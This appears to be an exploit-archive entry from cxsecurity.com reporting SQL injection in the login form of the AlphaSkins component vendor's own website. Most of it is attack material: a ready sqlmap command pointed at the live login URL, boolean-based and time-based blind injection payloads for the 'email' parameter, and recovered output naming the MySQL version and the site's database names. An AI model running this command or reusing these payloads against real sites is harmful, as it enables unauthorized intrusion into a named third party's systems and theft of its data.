AlphaSkins Alpha Controls Package | SQL Injection Vulnerability

2021.12.27
tr 0x01369 (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Alpha Skins Alpha Controls Package | SQL Injection Vulnerability # Author: Чингис хаан # Tested On: Kali Linux # sqlmap -u "https://www.alphaskins.com/login.php" --form --current-db --dbs --banner --batch --------------------------------------------------------------------------------------------------- Alpha Skins Alpha Controls Package RAD Studio Delphi And C++ Builder VCL Components With Extended Styles And Possibilities https://www.alphaskins.com/login.php --- Parameter: email (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: email=BWVv' OR NOT 8762=8762-- cbLi&pwd= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=BWVv' AND (SELECT 1213 FROM (SELECT(SLEEP(5)))HHoN)-- ZqkK&pwd= --- the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.0.12 (Percona fork) banner: '5.7.23-23' available databases [2]: [+] alphaski_ddm1 [+] information_schema

References:

0x01369


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top